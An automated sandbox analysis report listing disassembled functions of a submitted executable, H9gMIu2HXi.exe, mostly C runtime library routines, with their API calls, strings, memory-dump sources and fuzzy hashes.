                                                                                              • Instruction ID: 2132cda774763d114f519a32df476f21d553dd62273b6c61158381712739199b
                                                                                              • Opcode Fuzzy Hash: 16db74330875fa830478c072669fe87488867b81cb0ffead4c9f5379117c0cc8
                                                                                              • Instruction Fuzzy Hash: D9E04FB08047116ED7605F74A959F02BEE4BB1870AF118C1DF68693195D6B4D8C58B10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A43D6A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2252061734-0
                                                                                              • Opcode ID: 6a14c2c7c13516d635594378bf9a26ff6e79ba068be413b60cb1f246ac0e1c36
                                                                                              • Instruction ID: e7433558db79c2552b6c7a083bb05fe11a91871a56a86d33eda22d18ce057be5
                                                                                              • Opcode Fuzzy Hash: 6a14c2c7c13516d635594378bf9a26ff6e79ba068be413b60cb1f246ac0e1c36
                                                                                              • Instruction Fuzzy Hash: 5651AD7BA02206AFEF299F15D942B6A77B4FFC4310F14492DE90257291E771EE80CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4D0F0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00A4D0F9
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A4D11C
                                                                                                • Part of subcall function 00A4A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A4DBEC,00000000,?,00A480B1,?,00000008,?,00A4A871,?,?,?), ref: 00A4A830
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A4D142
                                                                                              • _free.LIBCMT ref: 00A4D155
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A4D164
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: d28477dc154e11ba54eeaa57bd69d17a1ce09efac65f93865bab1d0d4e01f94c
                                                                                              • Instruction ID: b6fca4319fcea084069749ae3673aaeec90cb3d239ee6996f31b997e95ec625e
                                                                                              • Opcode Fuzzy Hash: d28477dc154e11ba54eeaa57bd69d17a1ce09efac65f93865bab1d0d4e01f94c
                                                                                              • Instruction Fuzzy Hash: 7F018F7A6017257F27215BBA6C88C7B6A7DFEC6BA53150329FD08C7201EA648C42C1B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4A599 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,00A4A7F0,00A4C348,?,00A4A543,00000001,00000364,?,00A45281,00000050,?,00A63070,00000200), ref: 00A4A59E
                                                                                              • _free.LIBCMT ref: 00A4A5D3
                                                                                              • _free.LIBCMT ref: 00A4A5FA
                                                                                              • SetLastError.KERNEL32(00000000,?,00A63070,00000200), ref: 00A4A607
                                                                                              • SetLastError.KERNEL32(00000000,?,00A63070,00000200), ref: 00A4A610
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: 26f54b0e60ca0a035b6f94f50b2c330d8484e32d32f5a5784ed99c5846621dd3
                                                                                              • Instruction ID: bc587dbd98191d59fc25b57b070a6b77162c42efef0c25c86a92040c3451bb84
                                                                                              • Opcode Fuzzy Hash: 26f54b0e60ca0a035b6f94f50b2c330d8484e32d32f5a5784ed99c5846621dd3
                                                                                              • Instruction Fuzzy Hash: 5F01F93E2C5600A7C212A7B46F45D1B257AEBF577132A0018F90D92181FF748D426167
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3220D Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A324EF: ResetEvent.KERNEL32(?), ref: 00A32501
                                                                                                • Part of subcall function 00A324EF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00A32515
                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00A32241
                                                                                              • CloseHandle.KERNEL32(?,?), ref: 00A3225B
                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00A32274
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A32280
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A3228C
                                                                                                • Part of subcall function 00A32303: WaitForSingleObject.KERNEL32(?,000000FF,00A32526,?), ref: 00A32309
                                                                                                • Part of subcall function 00A32303: GetLastError.KERNEL32(?), ref: 00A32315
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1868215902-0
                                                                                              • Opcode ID: 1fc18f5cf5cb78cea2d19313504ecfc4cc3f486cbfae6e7f11d36369eb62ad83
                                                                                              • Instruction ID: cbcecebe927e14fcfe39900c2552aa46761602e87d5129189599207f08683047
                                                                                              • Opcode Fuzzy Hash: 1fc18f5cf5cb78cea2d19313504ecfc4cc3f486cbfae6e7f11d36369eb62ad83
                                                                                              • Instruction Fuzzy Hash: A5017172000B04EFC7229BA4DD84BC6BBA9FB08715F104929F26B521A0CB796A96CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4D9BF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00A4D9D7
                                                                                                • Part of subcall function 00A4A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?), ref: 00A4A680
                                                                                                • Part of subcall function 00A4A66A: GetLastError.KERNEL32(?,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?,?), ref: 00A4A692
                                                                                              • _free.LIBCMT ref: 00A4D9E9
                                                                                              • _free.LIBCMT ref: 00A4D9FB
                                                                                              • _free.LIBCMT ref: 00A4DA0D
                                                                                              • _free.LIBCMT ref: 00A4DA1F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: dd60674c81311c92b9e45cb5da05acb065e914bdbedcd449cdf675dedaa40779
                                                                                              • Instruction ID: f2e25367803f1f90d19ca01b7e4a83eef4383fa08f9775b5688f0c12afc51bf6
                                                                                              • Opcode Fuzzy Hash: dd60674c81311c92b9e45cb5da05acb065e914bdbedcd449cdf675dedaa40779
                                                                                              • Instruction Fuzzy Hash: C6F01276554210AB8620DFA4F686C1AB7F9FB94B507990C0AF04CD7541CBB1FC808654
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A33338 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00A33340
                                                                                              • _wcslen.LIBCMT ref: 00A33351
                                                                                              • _wcslen.LIBCMT ref: 00A33361
                                                                                              • _wcslen.LIBCMT ref: 00A3336F
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00A2C844,?,?,00000000,?,?,?), ref: 00A3338A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CompareString
                                                                                              • String ID:
                                                                                              • API String ID: 3397213944-0
                                                                                              • Opcode ID: a1c0b145df164ee41fe38f3f1d3a80bcf02562738337d0e2b7d2cb2df16c8236
                                                                                              • Instruction ID: 219af9eceaa24fe8879e686862fa37ce16f51d359aa017170d0cdf9b5f86c6e6
                                                                                              • Opcode Fuzzy Hash: a1c0b145df164ee41fe38f3f1d3a80bcf02562738337d0e2b7d2cb2df16c8236
                                                                                              • Instruction Fuzzy Hash: C2F01D37008214BBCF126F51DC09DCE3F26EB98B71B258015F6196E061CE7296659690
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A49CD0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00A49CEE
                                                                                                • Part of subcall function 00A4A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?), ref: 00A4A680
                                                                                                • Part of subcall function 00A4A66A: GetLastError.KERNEL32(?,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?,?), ref: 00A4A692
                                                                                              • _free.LIBCMT ref: 00A49D00
                                                                                              • _free.LIBCMT ref: 00A49D13
                                                                                              • _free.LIBCMT ref: 00A49D24
                                                                                              • _free.LIBCMT ref: 00A49D35
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 2873e8745b8e0dc86826a45a4aa85c6ea19f834c545596a0cca50de94ce9ad87
                                                                                              • Instruction ID: 8e73e7bb1bf56c8089ac09a970920f1645be564812d0c51c8b975ebf84e4f8f0
                                                                                              • Opcode Fuzzy Hash: 2873e8745b8e0dc86826a45a4aa85c6ea19f834c545596a0cca50de94ce9ad87
                                                                                              • Instruction Fuzzy Hash: 7DF0FE78845122DFC702EF94FD82C467BB1F7797213460606F41957275E77209638B85
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A32948 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _swprintf
                                                                                              • String ID: %ls$%s: %s
                                                                                              • API String ID: 589789837-2259941744
                                                                                              • Opcode ID: a3a056eeaec3f3c6e86aea0d6b0b8c4b3d6f7cdb422773d98b1baa622ef3b04d
                                                                                              • Instruction ID: b83b0db514a7b7d00032ee62ac80c21d0e403a078142567fb41b070f1e356c8b
                                                                                              • Opcode Fuzzy Hash: a3a056eeaec3f3c6e86aea0d6b0b8c4b3d6f7cdb422773d98b1baa622ef3b04d
                                                                                              • Instruction Fuzzy Hash: 5851C331A88300FFEA256F949D02F36B675AF14F41F204917FB9BB80E5C6A29550AB17
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A49330 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\H9gMIu2HXi.exe,00000104), ref: 00A49370
                                                                                              • _free.LIBCMT ref: 00A4943B
                                                                                              • _free.LIBCMT ref: 00A49445
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Users\user\Desktop\H9gMIu2HXi.exe
                                                                                              • API String ID: 2506810119-1714539950
                                                                                              • Opcode ID: bd70cad1e1f458febb046c5e07714fda0c1cc6447f8a533d36d74b84e3add0e0
                                                                                              • Instruction ID: 82b38219288fbbd0e91d665a3a1e6fb5594f732910ab9d75f6cbca9d43f1d5cc
                                                                                              • Opcode Fuzzy Hash: bd70cad1e1f458febb046c5e07714fda0c1cc6447f8a533d36d74b84e3add0e0
                                                                                              • Instruction Fuzzy Hash: 3F31A279A00218EFDB21DF99D985D9FBBFCEBC9710F1040AAF50497241D7705A528B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A44366 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00A4438B
                                                                                              • _abort.LIBCMT ref: 00A44496
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer_abort
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 948111806-2084237596
                                                                                              • Opcode ID: 2690b3a73051c4db34c7bf89f362bc3a63c8c3229347795fd222598ad3d10786
                                                                                              • Instruction ID: 04fc63babc52d3c0e43c300151d43b7d4131ba173c24a5809bf0287172cafd7f
                                                                                              • Opcode Fuzzy Hash: 2690b3a73051c4db34c7bf89f362bc3a63c8c3229347795fd222598ad3d10786
                                                                                              • Instruction Fuzzy Hash: C2414876900209AFDF15DFA8DD81BAEBBB5BF88304F148159FA046B221D335EA61DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A27F1B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A27F20
                                                                                                • Part of subcall function 00A242F1: __EH_prolog.LIBCMT ref: 00A242F6
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00A27FE5
                                                                                                • Part of subcall function 00A28704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A28713
                                                                                                • Part of subcall function 00A28704: OpenProcessToken.ADVAPI32(00000000), ref: 00A2871A
                                                                                                • Part of subcall function 00A28704: GetLastError.KERNEL32 ref: 00A28759
                                                                                                • Part of subcall function 00A28704: CloseHandle.KERNEL32(?), ref: 00A28768
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prologLastProcess$CloseCurrentHandleOpenToken
                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                              • API String ID: 2595646239-639343689
                                                                                              • Opcode ID: 3af9862cd0864720744f8d4c9a0d04c2d1e818f258929431798a05586d144c75
                                                                                              • Instruction ID: 81c273bbffc21943d959c920d174aa03f7b6097d376339ff6bb7d1c1786e20de
                                                                                              • Opcode Fuzzy Hash: 3af9862cd0864720744f8d4c9a0d04c2d1e818f258929431798a05586d144c75
                                                                                              • Instruction Fuzzy Hash: ED31E531D44264BEDF20EBACAE01BEE7BB9AB04354F004035F805A6195CBB88E49CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3BDE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A212F6: GetDlgItem.USER32(00000000,00003021), ref: 00A2133A
                                                                                                • Part of subcall function 00A212F6: SetWindowTextW.USER32(00000000,00A545F4), ref: 00A21350
                                                                                              • EndDialog.USER32(?,00000001), ref: 00A3BE68
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00A3BE7D
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A3BE92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: ASKNEXTVOL
                                                                                              • API String ID: 445417207-3402441367
                                                                                              • Opcode ID: 806b6db6e48448094b2156fe037f95a03580aa5abad86d87acfeb0fc3d11d788
                                                                                              • Instruction ID: f3ded979f9278f689094c18b708543a4a63ba3906a6c9bd346be8aae90f96d54
                                                                                              • Opcode Fuzzy Hash: 806b6db6e48448094b2156fe037f95a03580aa5abad86d87acfeb0fc3d11d788
                                                                                              • Instruction Fuzzy Hash: 2E11B633610121BFD611DFACED09FBA37AAFB4AB40F140414FB40AB1B5C762990A9775
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2EC0C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __fprintf_l.LIBCMT ref: 00A2EC74
                                                                                              • _strncpy.LIBCMT ref: 00A2ECBA
                                                                                                • Part of subcall function 00A330F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00A63070,00000200,00A2EC48,00000000,?,00000050,00A63070), ref: 00A33112
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                              • String ID: $%s$@%s
                                                                                              • API String ID: 562999700-834177443
                                                                                              • Opcode ID: 6e41e2fb8c0ad96825405fb688585f4b31f02cdba35d780156b2ca9779e405df
